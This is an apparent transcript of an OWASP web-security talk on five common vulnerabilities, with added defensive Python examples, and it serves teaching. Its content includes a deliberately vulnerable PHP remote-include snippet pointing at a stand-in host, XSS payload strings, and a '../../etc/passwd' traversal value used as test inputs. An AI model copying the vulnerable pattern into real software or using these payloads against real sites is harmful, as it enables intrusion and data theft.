Owasp Hacker Secrets Barcamp

Introduction to OWASP, OWASP Top 5, Network Security vs App Security and demos with WebGoat.
  1. Hacker's Secrets
     Sharmishtha Gupta [email_address]

  2. Agenda
     - What is OWASP?
     - Web security vs Network security
     - OWASP Top 5
       - XSS
       - SQL Injection
       - Malicious File Execution
       - Insecure Direct Object Reference
       - Cross Site Request Forgery (CSRF)

  3. What is OWASP?
     - Open Web Application Security Project
       - Mission: an open community focused on web application security

  4. What is OWASP?
     - Global community
     - Local Bangalore chapter: http://www.owasp.org/index.php/Bangalore
     - Open source projects and tools to improve web application security
     - Open learning resources and forum on web security

  5. Web security vs Network security: Network Security
     - The challenge is to restrict access to the network and to network resources (servers)
     - To protect data being exchanged over the network from eavesdroppers
     - Mostly network layer stuff (packet filtering, firewalls etc.)
     [Diagram: Attacker -> Web Server]

  6. Web security vs Network security: Web Security
     - The network is already accessible on port 80 (or another web server port)
     - The challenge is to protect other network resources which are not exposed, e.g. information stored in the DB, other backend information
     [Diagram: Compromised Web Server -> Victim]

  7. OWASP Top 5
     - Top 5 webapp vulnerabilities
       - XSS
       - SQL Injection
       - Malicious File Execution
       - Insecure Direct Object Reference
       - Cross Site Request Forgery (CSRF)

  8. XSS
     - When user-provided data is used without validation and/or encoding
     - An attacker can execute a script in the victim's browser and hijack important user information without her knowing
     - Ex:
       - Alice sends a scrap to Bob on Orkut with a scriptlet.
       - When Bob opens his scrapbook, everyone in his network is sent spam scraps posing as Bob by the scriptlet.

  9. XSS
     - A real example is the "Samy worm" on MySpace.com, discovered in October 2005
       - http://namb.la/popular/tech.html
     - Demo
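The fix the XSS slides point at is output encoding: the scrap text must be HTML-encoded before it is placed in the page. The following is an added example (not code from the deck or from Orkut/MySpace) that renders a scrap both ways and then parses the result the way a browser would, so you can see that the encoded version contains no injected elements and no event-handler attributes. The sample scraps, the `render_scrap_*` helpers and the `<div class='scrap'>` template are all constructed for this illustration.

```python
import html
from html.parser import HTMLParser
from typing import List, Tuple

# Constructed sample scraps (not from the slides): one harmless, two carrying markup.
PLAIN_SCRAP = "Hi Bob, see you at Barcamp!"
SCRIPT_SCRAP = "<script>alert('xss')</script>"
IMG_SCRAP = "<img src=x onerror=alert(1)>"


def render_scrap_unsafe(message: str) -> str:
    """Vulnerable: the scrap text is dropped straight into the page."""
    return f"<div class='scrap'>{message}</div>"


def render_scrap_safe(message: str) -> str:
    """Fixed: HTML-encode the text for an element-content context, so any
    markup the sender typed is displayed as text and never parsed as tags."""
    return f"<div class='scrap'>{html.escape(message, quote=True)}</div>"


class TagCollector(HTMLParser):
    """Records every tag and every on* event-handler attribute that a
    browser would see in a rendered fragment."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []
        self.handlers: List[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))

    handle_startendtag = handle_starttag  # treat <img ... /> like <img ...>


def tags_in(rendered: str) -> Tuple[List[str], List[str]]:
    """Parse a rendered fragment and return (tag names, on* attribute names)."""
    parser = TagCollector()
    parser.feed(rendered)
    parser.close()
    return parser.tags, parser.handlers


def only_template_markup(rendered: str) -> bool:
    """True when the fragment contains nothing but the template's own <div>:
    no injected elements and no event-handler attributes."""
    tags, handlers = tags_in(rendered)
    return tags == ["div"] and handlers == []


if __name__ == "__main__":
    for scrap in (PLAIN_SCRAP, SCRIPT_SCRAP, IMG_SCRAP):
        print(
            "unsafe ok:", only_template_markup(render_scrap_unsafe(scrap)),
            "| safe ok:", only_template_markup(render_scrap_safe(scrap)),
        )
```

`html.escape` is the right tool only for element content and quoted attribute values; text that lands inside a `<script>` block, a URL, or CSS needs the encoding for that context instead, which is why the slide says "validation and/or encoding" rather than one universal filter.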
  10. SQL Injection
      - When user-provided data is sent to an interpreter (here SQL) as part of a command or query
      - An attacker can trick the interpreter into executing unintended commands or changing data
      - Demo
  11. Malicious File Execution
      - When user-provided input is used for executing remote code or loading local files
      - Allows attackers to include hostile code and data; can totally compromise the server

  12. Malicious File Execution
      - Most common sources of code injection are:
        - Dynamic paths/files used in require/include statements
        - eval(): a major source of code injection is calling eval() on improperly validated user-provided input.

  13. Malicious File Execution
      <?php
      // dynamic path: the request parameter goes straight into an include
      // (the assignment stands in for a request that supplies ?path=http://bad_site.org)
      $_GET['path'] = 'http://bad_site.org';
      include "{$_GET['path']}/header.inc";
      ?>
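The defence for the slide 13 pattern is to stop using the request parameter as a path at all and use it only as a key into an allowlist, with the real path built from the allowlisted value. The example below is added here and is not the deck's PHP (it is Python, so it can be run on its own); the template directory `/srv/app/templates`, the `INCLUDES` allowlist and the function names are assumptions made for the illustration. It refuses URL-shaped values, unknown names, and anything whose final path would leave the template directory, giving a distinct reason for each so rejected requests can be logged.

```python
import posixpath
from urllib.parse import urlsplit

# Assumed template directory and allowlist for this example (not from the slides).
TEMPLATE_DIR = "/srv/app/templates"
INCLUDES = {"header": "header.inc", "footer": "footer.inc", "sidebar": "sidebar.inc"}


class IncludeRejected(ValueError):
    """Raised instead of letting an untrusted value reach include/require."""


def resolve_include(name: str, base_dir: str = TEMPLATE_DIR) -> str:
    """Map an untrusted request parameter to a file under base_dir.

    The parameter is only ever used as a key into INCLUDES; the filesystem
    path is built from the allowlisted value, never from the input itself.
    """
    # 1. A URL (http://, ftp://, php:// ...) or protocol-relative //host is never a template.
    if urlsplit(name).scheme or name.startswith("//"):
        raise IncludeRejected(f"remote include refused: {name!r}")
    # 2. Unknown names are refused outright rather than "cleaned up".
    filename = INCLUDES.get(name)
    if filename is None:
        raise IncludeRejected(f"not an allowlisted include: {name!r}")
    # 3. Defence in depth: the final path must still lie inside base_dir.
    root = base_dir.rstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, filename))
    if not candidate.startswith(root + "/"):
        raise IncludeRejected(f"include escapes template directory: {candidate!r}")
    return candidate


def include_allowed(name: str) -> bool:
    """Boolean wrapper: True when the name would be served, False when refused."""
    try:
        resolve_include(name)
    except IncludeRejected:
        return False
    return True


if __name__ == "__main__":
    for requested in ("header", "http://bad_site.org", "../../etc/passwd", "admin"):
        try:
            print(requested, "->", resolve_include(requested))
        except IncludeRejected as why:
            print(requested, "-> rejected:", why)
```

The same key-lookup approach applies to the slide's second source, `eval()`: rather than evaluating a string the user supplied, dispatch on the string to a fixed table of functions, so no user-controlled text is ever parsed as code.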
  14. Insecure Direct Object Reference
      - If a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter
      - Attackers can manipulate those references to access other objects without authorization
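Two complementary fixes follow from the slide: check that the requesting user is authorised for the object behind every reference, and (optionally) stop exposing the raw database key by handing out per-session indirect references instead. The example below is added for this page and is not from the deck or from WebGoat; the `RECORDS` table, the user names and the `ReferenceMap` class are constructed for the illustration. The indirect map follows the access-reference-map idea OWASP describes, and the access check deliberately returns the same `Forbidden` for a missing record and for someone else's record, so responses do not reveal which ids exist.

```python
import secrets
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Record:
    record_id: int
    owner: str
    body: str


# Constructed sample data (not from the slides): two users, one record each.
RECORDS: Dict[int, Record] = {
    1001: Record(1001, "alice", "alice's private note"),
    1002: Record(1002, "bob", "bob's private note"),
}


class Forbidden(Exception):
    """Single failure path: a missing record and another user's record look alike."""


def fetch_record_unsafe(record_id: int) -> str:
    """Vulnerable: whoever knows (or guesses) the id gets the record."""
    return RECORDS[record_id].body


def fetch_record(current_user: str, record_id: int) -> str:
    """Fixed: the reference is only honoured after an ownership check."""
    record = RECORDS.get(record_id)
    if record is None or record.owner != current_user:
        raise Forbidden()
    return record.body


class ReferenceMap:
    """Per-session indirect references: the client sees random tokens, never
    the database key, and a token only maps back inside the session that
    issued it."""

    def __init__(self) -> None:
        self._public: Dict[int, str] = {}
        self._internal: Dict[str, int] = {}

    def public_ref(self, record_id: int) -> str:
        if record_id not in self._public:
            token = secrets.token_urlsafe(9)
            self._public[record_id] = token
            self._internal[token] = record_id
        return self._public[record_id]

    def internal_id(self, token: str) -> Optional[int]:
        return self._internal.get(token)


def fetch_by_ref(current_user: str, refmap: ReferenceMap, token: str) -> str:
    """Both layers together: translate the token, then still check ownership."""
    record_id = refmap.internal_id(token)
    if record_id is None:
        raise Forbidden()
    return fetch_record(current_user, record_id)


def is_forbidden(fn, *args) -> bool:
    """True when the call is refused with Forbidden (handy for tests/logging)."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    alice_session = ReferenceMap()
    link = alice_session.public_ref(1001)          # what Alice's page would contain
    print(link, "->", fetch_by_ref("alice", alice_session, link))
    print("raw id from Alice's session refused:", is_forbidden(fetch_by_ref, "alice", alice_session, "1002"))
```

The ownership check is the part that cannot be skipped; indirect references only reduce the exposed attack surface and must never replace the authorisation decision.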
  15. Error handling
      - Poor error handling is the main cause
      - Demos
        - Bad file inclusion
        - SQL connect failure

  16. Cross Site Request Forgery (CSRF)
      - An attack that forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application
      - This can be as powerful as the web application that it attacks

  17. Cross Site Request Forgery (CSRF)
      - Mostly when the source of the request is not validated
      - Gmail change-password CSRF vulnerability disclosed by Vicente on 3rd Mar 2009
        - http://seclists.org/fulldisclosure/2009/Mar/0029.html
      - Demo
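Slide 17 names the root cause, an unvalidated request source, and the standard defences follow directly: a secret token bound to the session that a cross-site page cannot obtain, plus a check of the `Origin` (or `Referer`) header. The example below is added for this page and is not Gmail's code or the deck's demo; the site origin `https://mail.example`, the secret key, the session ids and the request shapes are all constructed for the illustration. It models a change-password endpoint with both checks and then builds one request as the site's own form would send it and one as a form auto-submitted from another site would arrive.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Assumed for this example (not from the slides): a per-deployment secret and the site's own origin.
SECRET_KEY = secrets.token_bytes(32)
SITE_ORIGIN = "https://mail.example"


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session via HMAC: another site can neither read it
    (same-origin policy) nor derive it (needs SECRET_KEY)."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, token: Optional[str]) -> bool:
    """Constant-time comparison against the token this session should carry."""
    return token is not None and hmac.compare_digest(issue_csrf_token(session_id), token)


def request_origin_ok(headers: Dict[str, str]) -> bool:
    """The slide's 'source of request' check: Origin (or, failing that, Referer)
    must be this site. A request with neither header is treated as untrusted."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def handle_change_password(session_id: str, headers: Dict[str, str],
                           form: Dict[str, str]) -> Tuple[int, str]:
    """State-changing endpoint with both defences in front of it."""
    if not request_origin_ok(headers):
        return 403, "request did not originate from this site"
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    # a real handler would update the password for session_id here
    return 200, "password changed"


def legitimate_request(session_id: str) -> Tuple[int, str]:
    """Constructed request as the site's own form would send it."""
    return handle_change_password(
        session_id,
        {"Origin": SITE_ORIGIN},
        {"new_password": "correct horse", "csrf_token": issue_csrf_token(session_id)},
    )


def cross_site_request(session_id: str) -> Tuple[int, str]:
    """Constructed request as a form auto-submitted from another site arrives:
    the browser still attaches the victim's cookies (hence the same session_id),
    but the Origin is the other page and the token is absent."""
    return handle_change_password(
        session_id,
        {"Origin": "https://other.example"},
        {"new_password": "changed-by-someone-else"},
    )


if __name__ == "__main__":
    print("legitimate:", legitimate_request("sess-1"))
    print("cross-site:", cross_site_request("sess-1"))
```

The two checks cover different failure modes: the token protects even when the browser sends no `Origin`/`Referer` (some privacy settings and proxies strip them), while the origin check still refuses a cross-site request if a token ever leaks through XSS on a sibling page. Tying the token to the session rather than storing a random value per form also means a token captured from one session is useless in another.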
  18. Visit
      - WebGoat from OWASP
        - Good to solve the puzzles by learning vulnerabilities
        - Good hints and solutions
        - Download from http://code.google.com/p/webgoat/downloads/list
